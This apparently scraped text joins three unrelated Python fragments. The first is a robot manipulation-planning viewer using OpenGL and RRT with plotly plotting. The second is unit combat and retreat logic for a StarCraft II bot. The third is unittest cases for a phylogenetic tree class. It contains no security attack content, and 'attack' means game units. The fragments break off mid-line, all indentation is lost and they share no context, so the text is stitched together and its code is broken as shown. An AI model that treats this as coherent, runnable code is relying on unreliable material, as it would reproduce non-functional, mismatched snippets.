self.flat_shader.set_mat4('model', np.asarray(model))
view = glm.mat4(1.0)
self.flat_shader.set_mat4('view', np.asarray(view))
aspect_ratio = 800. / 600.
d = 10
ortho = glm.ortho(-d * aspect_ratio, d * aspect_ratio, -d, d, -100.0, 100.0)
# ortho = glm.ortho(-2*aspect_ratio, 2*aspect_ratio, -2, 2, -100.0, 100.0)
self.flat_shader.set_mat4('projection', np.asarray(ortho))
self.flat_shader.set_vec3('offset', np.zeros((3, 1), 'float32'))
self.flat_shader.set_float('scale', 1.0)
self.flat_shader.set_vec3('objectColor', np.ones((3, 1), 'float32'))
# self.draw_grid(5, 0.25)
# Draw obstacles.
self.flat_shader.set_vec3('objectColor', get_color('gray'))
self.collision_manager.draw(self.flat_shader.id, True, False)
if self.step_on:
# Draw object.
new_m = point_manipulator()
if self.counter >= len(self.path):
self.counter = 0
self.config = self.path[self.counter]
self.manip_p = self.mnp_path[self.counter]
if self.manip_p is not None:
for mnp in self.manip_p:
p = mnp.p
p = p[0:2]
new_m.update_config(np.array(p),self.config)
self.flat_shader.set_vec3('objectColor', get_color('red'))
new_m.obj.draw2d(self.flat_shader.id, True)
self.flat_shader.set_vec3('objectColor', get_color('clay'))
T2 = config2trans(np.array(self.config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
# print(self.counter, len(self.path))
time.sleep(0.07)
self.counter += 1
if self.path_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
for i in range(len(self.path)):
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = self.path[i]
T2 = config2trans(np.array(target_config))
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
if self.all_configs_on:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
# show all nodes
for node in self.nodes:
self.flat_shader.set_vec3('objectColor', get_color('clay'))
target_config = np.array(node)
T2 = config2trans(target_config)
T3 = np.identity(4)
T3[0:2, 3] = T2[0:2, 2]
T3[0:2, 0:2] = T2[0:2, 0:2]
self.target.transform()[:, :] = T3
self.target.draw2d(self.flat_shader.id, True)
def on_key_press2(self, key, scancode, action, mods):
if key == glfw.KEY_C and action == glfw.PRESS:
self.step_on = False
self.path_on = False
self.all_configs_on = False
if key == glfw.KEY_T and action == glfw.PRESS:
self.step_on = True
if key == glfw.KEY_A and action == glfw.PRESS:
self.all_configs_on = True
if key == glfw.KEY_P and action == glfw.PRESS:
self.path_on = True
def on_key_press(self, key, scancode, action, mods):
pass
# def on_mouse_press(self, x, y, button, modifiers):
# pass
# def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
# pass
def on_mouse_press(self, x, y, button, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if button == 1: # left click
self.camera.mouse_roll(x, y, False)
if button == 4: # right click
self.camera.mouse_zoom(x, y, False)
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
x = 2.0 * (x / 800.0) - 1.0
y = 2.0 * (y / 600.0) - 1.0
if buttons == 1: # left click
self.camera.mouse_roll(x, y)
if buttons == 4: # right click
self.camera.mouse_zoom(x, y)
def get_path(self, path, mnp_path):
self.path = path
self.mnp_path = mnp_path
def get_nodes(self, nodes):
self.nodes = nodes
def get_tree(self, tree):
self.tree = tree
object_shape = [1, 0.2, 0.2, 0.2]
X_dimensions = np.array([(-4.5, 4.5), (2, 3.5), (-2 * np.pi, 2 * np.pi)])
x_init = (0, 2.2, 0)
x_goal = (0, 3, -np.pi / 2)
world_key = 'vert'
dist_weight = 1
mnp_fn_max = 6
goal_kch = [0.01, 0.1, 1]
allow_contact_edges = [True, False, True, False]
viewer = Viewer()
_itbl.loadOpenGL()
manipulator = doublepoint_manipulator()
mnp_fn_max = None
step_length = 2
neighbor_r = 5
dist_cost = 1
app = iTM2d(object_shape, example='book')
viewer.set_renderer(app)
viewer.init()
X = SearchSpace(X_dimensions)
the_object = part(app.target, object_shape, allow_contact_edges)
rrt_tree = RRTManipulation(X, x_init, x_goal, environment(app.collision_manager), the_object, manipulator,
50, neighbor_r, world_key)
x = (-2.3, 2.2, 0)
x_rand = (-2.5, 2.2, -np.pi)
x_rand1 = (-3,3.5,-np.pi/3)
_, envs = rrt_tree.check_collision(x)
mnps = [Contact((-0.8,0.2),(0,-1),0),Contact((-0.8,-0.2),(0,1),0)]
mode = [CONTACT_MODE.FOLLOWING,CONTACT_MODE.FOLLOWING,CONTACT_MODE.SLIDING_LEFT,CONTACT_MODE.LIFT_OFF]
x_new, path, _ = rrt_tree.forward_integration(x,x_rand,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
x_new, path1, _ = rrt_tree.forward_integration(x,x_rand1,envs,mnps,mode)
path += [(-2.432,3,-np.pi/2)]
print(x_new)
print(path)
fig = go.Figure()
boundary = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
boundary += [q]
boundary += [(-2.8,3,-np.pi/2)]
for x0 in np.arange(-2.8,-1.1,0.1):
boundary += [(x0,3,-np.pi/2)]
boundary += [(-1.1,3,-np.pi/2)]
b0 = []
for theta in np.arange(0,np.pi/2,0.1):
q = (-1.3-1*np.cos(theta)+0.2*np.sin(theta), 2+0.2*np.cos(theta)+1*np.sin(theta),-theta)
b0 += [q]
b0.reverse()
boundary+=b0
for x0 in np.arange(-4,-2.3,0.1):
boundary += [(x0,2.2,0)]
'''
x1, path1, _ = rrt_tree.forward_integration(x,(-4,2.2,0),envs,mnps,mode)
x2, path2, _ = rrt_tree.forward_integration(x,(-4,2.2,-np.pi/4),envs,mnps,mode)
x3, path3, _ = rrt_tree.forward_integration(x,(-3,2.6,-np.pi/3),envs,mnps,mode)
x4, path4, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi),envs,mnps,mode)
x5, path5, _ = rrt_tree.forward_integration(x,(-0.5,3,-np.pi),envs,mnps,mode)
x6, path6, _ = rrt_tree.forward_integration(x,(-4,3,-np.pi/2.5),envs,mnps,mode)
x7, path7, _ = rrt_tree.forward_integration(x,(-2,3,-np.pi),envs,mnps,mode)
'''
xb, yb, zb = np.array(boundary).T
#xs, ys, zs = np.array(boundary + path+path1+path2+path3+path4+path5+path6+path7).T
x,y,z = np.array(path).T
x1,y1,z1 = np.array(path1).T
fig = go.Figure()
fig.add_trace(go.Scatter3d(x=xb, y=zb, z=yb, mode='lines', line={'width':8, 'color':'blue'},name='Manifold Boundary'))
# fig.add_trace(go.Scatter3d(x=xs, y=ys, z=zs, mode='markers', opacity=0.50))
fig.add_trace(go.Scatter3d(x=x, y=z, z=y, name='trajectory 1', mode='lines+markers',line={'width':4,'color':'green'},marker={'size':4,'color':'green'}))
fig.add_trace(go.Scatter3d(x=x1, y=z1, z=y1,name='trajectory 2', mode='lines+markers',line={'width':4,'color':'red'}, marker={'size':4,'color':'red'}))
fig.add_trace(go.Scatter3d(x=[x_rand[0]], y=[x_rand[2]], z=[x_rand[1]], mode='markers',name = 'goal 1', marker={'size':6,'color':'green'}))
fig.add_trace(go.Scatter3d(x=[x_rand1[0]], y=[x_rand1[2]], z=[x_rand1[1]],mode='markers',name = 'goal 2', marker={'size':6,'color':'red'}))
fig.update_layout(
scene={
'xaxis_title':'x',
'yaxis_title' : 'θ',
| |
unit_obj.checkNewAction('move', self.rally_pos.x, self.rally_pos.y):
unit_obj.game.combinedActions.append(unit_obj.unit.move(self.rally_pos))
unit_obj.last_target = None
return True
return False
def defend(self, unit_obj):
#clear out destructables around the base.
# for nexus in self.units(NEXUS):
# items = self.destructables.closer_than(15, nexus)
# if items:
# item = items.closest_to(nexus)
# if item.name == 'CollapsibleTerranTowerDiagonal' or item.name == 'CollapsibleRockTowerDiagonal':
# continue
# unit_obj.game.combinedActions.append(unit_obj.unit.attack(item))
# unit_obj.last_target = None
# unit_obj.last_action = 'Destructables'
# return True
if self.defensive_pos and unit_obj.unit.distance_to(self.defensive_pos) > 5:
if unit_obj.checkNewAction('move', self.defensive_pos.x, self.defensive_pos.y):
unit_obj.game.combinedActions.append(unit_obj.unit.move(self.defensive_pos))
unit_obj.last_target = None
return True
return False
def waitForce(self, unit_obj, bonus_range=0):
#evaluates battle conditions before joining the battle.
#only use early in game for probing, terrible in late game.
if self.time > 180:
return False
#check to see if we are defending and if we are near our own bases, if so attack anyway.
if self.defend_only and self.units(NEXUS).closer_than(25, unit_obj.unit):
return False #defending, attack!
#check to see if we are already in battle, if so just exist.
#if anyone is in our range or attack, if we are in anyone elses range of attack.
unit_range = unit_obj.unit.ground_range + bonus_range
if unit_obj.unit.air_range > unit_obj.unit.ground_range:
unit_range = unit_obj.unit.air_range + bonus_range
#see if any enemies are in our range.
enemyThreats = unit_obj.closestEnemies.not_structure.filter(lambda x: unit_obj.unit.target_in_range(x, bonus_distance=bonus_range))
if enemyThreats:
return False #already engaged.
#stay out of enemy range.
enemyThreats = unit_obj.closestEnemies.filter(lambda x: x.target_in_range(unit_obj.unit, bonus_distance=1 + bonus_range))
if enemyThreats:
return False #already engaged.
#now evaluate to see if we need to keep moving, or just stand still.
enemyThreats = unit_obj.closestEnemies.sorted(lambda x: x.distance_to(unit_obj.unit))
[enemyDPStoGround, enemyDPStoAir, enemyAirHealth, enemyGroundHealth, enemyTotalDPS, closestEnemy, enemyGroundtoAirDPS, enemyAirtoGroundDPS, enemyGroundtoGroundDPS, enemyAirtoAirDPS] = self.getAllEnemyStats(unit_obj)
#get all the friends near the closest enemy.
if closestEnemy:
[friendDPStoGround, friendDPStoAir, friendAirHealth, friendGroundHealth, friendTotalDPS] = self.unitList.friendlyEngagedFighters(closestEnemy)
###if there is an enemy on the ground but no grounddps, then we can't damage the enemy and need to leave.
if enemyGroundHealth > 0 and friendDPStoGround == 0 and enemyGroundtoAirDPS > 0:
self.stayMaxRange(unit_obj, closestEnemy)
return True
if enemyAirHealth > 0 and friendDPStoAir == 0 and enemyAirtoGroundDPS > 0:
self.stayMaxRange(unit_obj, closestEnemy)
return True
#calculate our die times.
enemyAirDieTime = 0
enemyGroundDieTime = 0
enemyOverDieTime = 0
friendAirDieTime = 0
friendGroundDietime = 0
friendOverDieTime = 0
if friendDPStoAir > 0:
enemyAirDieTime = enemyAirHealth / friendDPStoAir
if friendDPStoGround > 0:
enemyGroundDieTime = enemyGroundHealth / friendDPStoGround
if friendTotalDPS > 0:
enemyOverDieTime = (enemyAirHealth + enemyGroundHealth) / friendTotalDPS
if enemyDPStoAir > 0:
friendAirDieTime = friendAirHealth /enemyDPStoAir
if enemyDPStoGround > 0:
friendGroundDietime = friendGroundHealth / enemyDPStoGround
if enemyTotalDPS > 0:
friendOverDieTime = (friendAirHealth + friendGroundHealth) / enemyTotalDPS
if (friendAirDieTime + friendGroundDietime) > 0 and (enemyAirDieTime + enemyGroundDieTime) == 0:
#print ('Danger found')
self.stayMaxRange(unit_obj, closestEnemy)
return True
#check if overall battle can be won.
if friendOverDieTime < enemyOverDieTime:
self.stayMaxRange(unit_obj, closestEnemy)
return True
if (friendAirDieTime + friendGroundDietime) < (enemyAirDieTime + enemyGroundDieTime):
#print ('Danger found')
self.stayMaxRange(unit_obj, closestEnemy)
return True
return False
def effectSafe(self, unit_obj):
#stay safe from objects and effects.
foundEffect = self.dodgeEffects(unit_obj)
if foundEffect:
#find the closest movable position away from the effect.
#create a grid around the unit.
possibles = []
if unit_obj.unit.is_flying:
possibles = self.retreatGrid(foundEffect[0], size=ceil(foundEffect[1] + unit_obj.unit.radius))
else:
possibles = self.groundRetreatGrid(foundEffect[0], size=ceil(foundEffect[1] + unit_obj.unit.radius))
if len(possibles) == 0:
return False
#calculate the distance of the remaining grid postions away from the effect
closestPosition = None
closestDistance = 100
for position in possibles:
effectAwayDist = foundEffect[0].distance_to(position)
if effectAwayDist < foundEffect[1]:
continue #remove positions that are less than the radius.
#calculate the distance of the positions from ourselves.
ourAwayDist = unit_obj.unit.distance_to(position)
if ourAwayDist < closestDistance:
closestDistance = ourAwayDist
closestPosition = position
#move the position that is closest to use of the remaining positions.
if closestPosition:
if unit_obj.checkNewAction('move', closestPosition[0], closestPosition[1]):
self.combinedActions.append(unit_obj.unit.move(closestPosition))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestPosition.position)), color=Point3((219, 136, 4)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(closestPosition), color=Point3((0, 255, 55)))
if unit_obj.unit.name == 'Probe':
self.worker_moved = self.time + 3
return True
return False
def keepSafe(self, unit_obj):
#if it's a ground n
(danger, closestEnemy) = self.inDangerSimple(unit_obj)
if danger:
#if we are a phoenix, drop our target if needed.
if unit_obj.unit.name == 'Phoenix' and AbilityId.CANCEL_GRAVITONBEAM in unit_obj.abilities:
unit_obj.beam_unit = None
self.combinedActions.append(unit_obj.unit(AbilityId.CANCEL_GRAVITONBEAM))
return True
if self.goRetreat(unit_obj, closestEnemy):
return True
return False
def KeepKiteRange(self, unit_obj, bonus_range=0):
#kite if we can.
targetEnemy = self.findKiteTarget(unit_obj, bonus_range)
if targetEnemy:
if not targetEnemy.name in ['Carrier', 'Battlecruiser', 'PlanetaryFortress', 'Bunker'] and not (targetEnemy.can_attack_air or targetEnemy.can_attack_ground) and unit_obj.closestEnemies.filter(lambda x: x.can_attack_air or x.can_attack_ground).exists:
#print ('found better kite target')
return False #better targets out there.
#kitePoint = unit_obj.unit.position.towards(targetEnemy.position, distance=-0.1)
kitePoint = self.findKiteBackTarget(unit_obj, targetEnemy)
if len(kitePoint) > 0:
if unit_obj.checkNewAction('move', kitePoint[0], kitePoint[1]):
self.combinedActions.append(unit_obj.unit.move(kitePoint))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = kitePoint.position
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(targetEnemy.position3d), color=Point3((0, 206, 3)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(kitePoint), color=Point3((212, 66, 244)))
return True
return False
def attack(self, unit_obj, bonus_range=0):
if unit_obj.unit.weapon_cooldown == 0:
targetEnemy = self.findBestTarget(unit_obj, bonus_range)
if targetEnemy:
#check if this is a melee unit, and do a move attack instead of target attack.
if not unit_obj.unit.is_flying and unit_obj.unit.ground_range < 2:
self.combinedActions.append(unit_obj.unit.attack(targetEnemy.position))
else:
self.combinedActions.append(unit_obj.unit.attack(targetEnemy))
unit_obj.last_action = 'attack'
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((targetEnemy.position3d.x, targetEnemy.position3d.y, (targetEnemy.position3d.z + 1)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(targetEnemy.position3d), color=Point3((219, 4, 4)))
return True
return False
def doNothing(self, unit_obj):
#if our weapon is on cooldown, but we have enemies in range, then we just do nothing.
if unit_obj.unit.weapon_cooldown != 0:
targetEnemy = unit_obj.closestEnemies.in_attack_range_of(unit_obj.unit)
#targetEnemy = self.findBestTarget(unit_obj.unit)
if targetEnemy:
#enemies in range, do nothing.
if unit_obj.checkNewAction('wait', 0, 0):
self.combinedActions.append(unit_obj.unit.stop())
unit_obj.last_target = Point3((targetEnemy.first.position3d.x, targetEnemy.first.position3d.y, (targetEnemy.first.position3d.z + 1)))
return True
return False
def moveToFriendlies(self, unit_obj):
#if we are moving and no enemies exist, then we must be search, so return false.
if unit_obj.unit.is_moving and len(self.cached_enemies) == 0:
return False
closestFriendly = None
fUnits = self.units().filter(lambda x: not x.type_id in {WARPPRISM,OBSERVER,PROBE,PHOENIX}
and not x.is_structure
and (x.can_attack_ground or x.can_attack_air))
if unit_obj.unit.can_attack_ground and not unit_obj.unit.can_attack_air:
#can only attack ground, so go to enemies that are near ground units.
if self.cached_enemies.not_flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.not_flying.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
# can only attack air units.
if self.cached_enemies.flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.flying.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
else:
#can attack anything.
if self.cached_enemies.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
if closestFriendly:
#if we are not close to it, then our priority is to get there.
if unit_obj.unit.distance_to(closestFriendly) > 10:
if unit_obj.checkNewAction('move', closestFriendly.position.x, closestFriendly.position.y):
self.combinedActions.append(unit_obj.unit.move(closestFriendly))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((closestFriendly.position3d.x, closestFriendly.position3d.y, (closestFriendly.position3d.z + 1)))
return True
return False
def moveToFriendliesNearWarpprism(self, unit_obj):
#if we are moving and no enemies exist, then we must be search, so return false.
if unit_obj.unit.is_moving and len(self.cached_enemies) == 0:
return False
#this version will get the enemy nearest the attack point. self.prism_pylon_pos
closestFriendly = None
fUnits = self.units().not_structure.exclude_type([WARPPRISM,OBSERVER,PROBE]).filter(lambda x: x.can_attack_ground or x.can_attack_air)
if unit_obj.unit.can_attack_ground and not unit_obj.unit.can_attack_air:
#can only attack ground, so go to enemies that are near ground units.
if self.cached_enemies.not_flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.not_flying.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
# can only attack air units.
if self.cached_enemies.flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.flying.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
else:
#can attack anything.
if self.cached_enemies.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
if closestFriendly:
#if we are not close to it, then our priority is to get there.
if unit_obj.unit.distance_to(closestFriendly) > 10:
if unit_obj.checkNewAction('move', closestFriendly.position.x, closestFriendly.position.y):
self.combinedActions.append(unit_obj.unit.move(closestFriendly))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((closestFriendly.position3d.x, closestFriendly.position3d.y, (closestFriendly.position3d.z + 1)))
return True
return False
def getUnitEnemies(self, unit_obj, radius=25):
units = Units((), self)
if unit_obj.sendHome:
units = self.cached_enemies
else:
if self.cached_enemies.exclude_type(_exclude_list):
units = self.cached_enemies.exclude_type(_exclude_list).closer_than(radius, unit_obj.unit)
if len(units) > 0:
self.unit_engaged = True
self.moveRally = False
return units
def canEscape(self, unit_obj):
enemyThreatsClose = unit_obj.closestEnemies.filter(lambda x: x.target_in_range(unit_obj.unit)).sorted(lambda x: x.movement_speed, reverse=True)
if enemyThreatsClose.exists:
if unit_obj.unit.movement_speed < enemyThreatsClose.first.movement_speed:
return False
return True
#####################
#micro utlities code#
#####################
def checkHome(self, unit_obj):
#check to see if there is a friendly base near the units.
if not self.defend_only or not self.under_attack:
return False
if len(self.units(NEXUS)) > 0 and len(self.cached_enemies) > 0:
if self.units(NEXUS).closer_than(30, unit_obj.unit):
return False
else:
#check to make sure we can even attack whatever it is that is attacking.
allNexus = None
if unit_obj.unit.can_attack_air and unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.closer_than(30, x)) > 0)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.flying.closer_than(30, x)) > 0)
elif not unit_obj.unit.can_attack_air and unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.not_flying.closer_than(30, x)) > 0)
#find the closest friendly that is under attack.
#closestNexus = self.game_info.player_start_location
if allNexus:
closestNexus = allNexus.sorted(lambda x: x.distance_to(unit_obj.unit)).first
unit_obj.homeTarget = closestNexus
return True
return False
def checkSurrounded(self, unit_obj) -> bool:
#check for enemies near the unit.
if len(unit_obj.closestEnemies) > 0:
enemyThreats = unit_obj.closestEnemies.closer_than((unit_obj.unit.radius + 1), unit_obj.unit)
if len(enemyThreats) > 5:
return True
return False
def goRetreat(self, unit_obj, closestEnemy):
if unit_obj.unit.name == 'Probe':
self.worker_moved = self.time + 3
unit_obj.retreating = True
#first just do a simple move if possible.
retreatPoint = self.findSimpleRetreatPoint(unit_obj.unit, closestEnemy)
if retreatPoint:
#self.last_target = retreatPoint.position
if unit_obj.checkNewAction('move', retreatPoint[0], retreatPoint[1]):
self.combinedActions.append(unit_obj.unit.move(retreatPoint))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestEnemy.position)), color=Point3((219, 136, 4)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(retreatPoint), color=Point3((0, 255, 55)))
return True
#if nothing has been found, look around for an area
retreatPoint = None
if not unit_obj.unit.is_flying:
retreatPoint = self.findGroundRetreatTarget(unit_obj.unit, inc_size=1, enemy_radius=10)
else:
retreatPoint = self.findAirRetreatTarget(unit_obj.unit, inc_size=1, enemy_radius=10)
if retreatPoint:
#self.last_target = retreatPoint.position
if unit_obj.checkNewAction('move', retreatPoint[0], retreatPoint[1]):
self.combinedActions.append(unit_obj.unit.move(retreatPoint))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestEnemy.position)), color=Point3((216, 0, 101)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(retreatPoint), color=Point3((10, 2, 234)))
return True
return False
def stayMaxRange(self, unit_obj, enemy):
#stay minimum of 9 range from closest.
#get the distance of the enemy - our attack range and move that far back.
#dist = unit_obj.unit.distance_to(enemy) - (unit_obj.unit.radius + enemy.radius + use_range)
#move away from the target that much.
if unit_obj.unit.position != enemy.position:
#check to see if we should move away.
if unit_obj.unit.distance_to(enemy.position) < 9:
targetpoint = unit_obj.unit.position.towards(enemy.position, distance=-2)
unit_obj.last_target = Point3((targetpoint.position.x, targetpoint.position.y, (unit_obj.unit.position3d.z + 1)))
if unit_obj.checkNewAction('move', targetpoint.position[0], targetpoint.position[1]):
self.combinedActions.append(unit_obj.unit.move(targetpoint))
return
else:
if unit_obj.checkNewAction('move', unit_obj.unit.position[0], unit_obj.unit.position[1]):
self.combinedActions.append(unit_obj.unit.stop())#(unit_obj.unit.position))
return
def targetFacing(self, unit_obj, enemy) -> bool:
#return True on units that don't face a certain direction.
if enemy.name in ['MissileTurret','SporeCrawler','SpineCrawler', 'PhotonCannon', 'Bunker']:
return True
#find out if the unit is facing
faceTarget = self.towardsDirection(enemy.position, enemy.facing, 1)
if unit_obj.unit.distance_to(faceTarget) > unit_obj.unit.distance_to(enemy):
return False
return True
def leadTarget(self, enemy, unit_obj):
#get the point that is enemy speed in distance ahead of enemy, if the enemy is moving.
#print ('moving', str(enemy.is_moving), enemy.position, enemy.facing, enemy.movement_speed)
#self._client.debug_text_3d(str(enemy.facing), enemy.position3d)
if self.unit_moves.get(enemy.tag):
leadTarget = self.towardsDirection(enemy.position, enemy.facing, enemy.movement_speed)
#check to see if the | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
from ete3 import TreeNode
from bg.edge import BGEdge
from bg.genome import BGGenome
from bg.multicolor import Multicolor
from bg.tree import BGTree
__author__ = "<NAME>"
__email__ = "aganezov(at)cs.jhu.edu"
__status__ = "production"
import unittest
class BGTreeTestCase(unittest.TestCase):
def setUp(self):
# commonly used values during the test cases
v1, v2, v3, v4, v5 = "v1", "v2", "v3", "v4", "v5"
self.v1 = v1
self.v2 = v2
self.v3 = v3
self.v4 = v4
self.v5 = v5
self.bg_v1 = BGGenome(self.v1)
self.bg_v2 = BGGenome(self.v2)
self.bg_v3 = BGGenome(self.v3)
self.bg_v4 = BGGenome(self.v4)
self.bg_v5 = BGGenome(self.v5)
def test_edge_length(self):
# every edge in a tree has a length
# if no specific length, was specified on edge addition, a default value (1) is stored for this edge
tree = BGTree("(v1:5)v2;")
self.assertEqual(tree.get_distance(node1_name=self.v1, node2_name=self.v2), 5)
self.assertEqual(tree.get_distance(node1_name=self.v2, node2_name=self.v1), 5)
# edge_length lookup is available only for existing edges, thus both vertices have to be present
# and an edge between them must exist
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v1, node2_name=self.v3)
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v3, node2_name=self.v4)
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v3, node2_name=self.v4)
def test_add_edge(self):
# an edge supports an operation to add a new edge (branch) to the tree
# if vertices of specified edge were not present in the tree, they are added automatically
tree = BGTree("(v1:5)v2;")
tree.multicolors_are_up_to_date = True
tree.add_edge(node1_name=self.v1, node2_name=self.v3)
self.assertFalse(tree.multicolors_are_up_to_date)
self.assertEqual(len(list(tree.nodes())), 3)
self.assertEqual(len(list(tree.edges())), 2)
self.assertEqual(tree.get_distance(self.v1, self.v2), 5)
self.assertEqual(tree.get_distance(self.v1, self.v3), 1)
self.assertEqual(tree.get_distance(self.v2, self.v3), 6)
self.assertFalse(tree.multicolors_are_up_to_date)
def test_add_edge_explicit_edge_length(self):
# when an edge is added, one can explicitly set its length
tree = BGTree("(v1)v2;")
tree.multicolors_are_up_to_date = True
tree.add_edge(node1_name=self.v2, node2_name=self.v3, edge_length=5)
self.assertFalse(tree.multicolors_are_up_to_date)
self.assertEqual(len(list(tree.nodes())), 3)
self.assertEqual(len(list(tree.edges())), 2)
self.assertEqual(tree.get_distance(self.v1, self.v3), 6)
self.assertEqual(tree.get_distance(self.v2, self.v3), 5)
self.assertFalse(tree.multicolors_are_up_to_date)
def test_has_edge_direction(self):
tree = BGTree("((v1, v2:5)v3, v4)root;")
self.assertTrue(tree.has_edge(self.v3, self.v1))
self.assertFalse(tree.has_edge(self.v1, self.v3))
self.assertTrue(tree.has_edge(self.v3, self.v2))
self.assertFalse(tree.has_edge(self.v2, self.v3))
self.assertTrue(tree.has_edge("root", self.v3))
self.assertFalse(tree.has_edge(self.v3, "root"))
self.assertTrue(tree.has_edge("root", self.v4))
self.assertFalse(tree.has_edge(self.v4, "root"))
self.assertFalse(tree.has_edge(self.v1, self.v2))
self.assertFalse(tree.has_edge(self.v2, self.v1))
self.assertFalse(tree.has_edge(self.v3, self.v4))
self.assertFalse(tree.has_edge(self.v4, self.v3))
self.assertFalse(tree.has_edge(self.v1, self.v4))
self.assertFalse(tree.has_edge(self.v4, self.v1))
def test_has_edge_no_direction(self):
tree = BGTree("((v1, v2:5)v3, v4)root;")
self.assertTrue(tree.has_edge(self.v3, self.v1, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v1, self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v3, self.v2, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v2, self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge("root", self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v3, "root", account_for_direction=False))
self.assertTrue(tree.has_edge("root", self.v4, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v4, "root", account_for_direction=False))
self.assertFalse(tree.has_edge(self.v1, self.v2, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v2, self.v1, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v3, self.v4, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v4, self.v3, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v1, self.v4, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v4, self.v1, account_for_direction=False))
def test_has_node(self):
# tree has a O(1) method to check if a node is present in a tree
tree = BGTree("(v1, v2)root;")
self.assertTrue(tree.has_node(self.v1))
self.assertTrue(tree.has_node(self.v2))
self.assertTrue(tree.has_node("root"))
self.assertFalse(tree.has_node(self.v4))
def test_append_tree_no_copy(self):
tree1 = BGTree("(v1, v2)root;")
tree2 = BGTree("(v4, v5)v3;")
tree1.multicolors_are_up_to_date = True
tree2.multicolors_are_up_to_date = True
tree1.append(node_name=self.v1, tree=tree2)
#####
self.assertFalse(tree1.multicolors_are_up_to_date)
self.assertEqual(len(list(tree1.nodes())), 6)
self.assertEqual(len(list(tree1.edges())), 5)
self.assertTrue(tree1.has_edge(node1_name=self.v1, node2_name=self.v3))
#####
self.assertTrue(tree2.multicolors_are_up_to_date)
self.assertEqual(len(list(tree2.nodes())), 3)
self.assertEqual(len(list(tree2.edges())), 2)
tree1.get_node_by_name("v5").name = "new_v5"
self.assertFalse(tree2.has_node("v5"))
def test_append_tree_copy(self):
tree1 = BGTree("(v1, v2)root;")
tree2 = BGTree("(v4, v5)v3;")
tree1.multicolors_are_up_to_date = True
tree2.multicolors_are_up_to_date = True
tree1.append(node_name=self.v1, tree=tree2, copy=True)
#####
self.assertFalse(tree1.multicolors_are_up_to_date)
self.assertEqual(len(list(tree1.nodes())), 6)
self.assertEqual(len(list(tree1.edges())), 5)
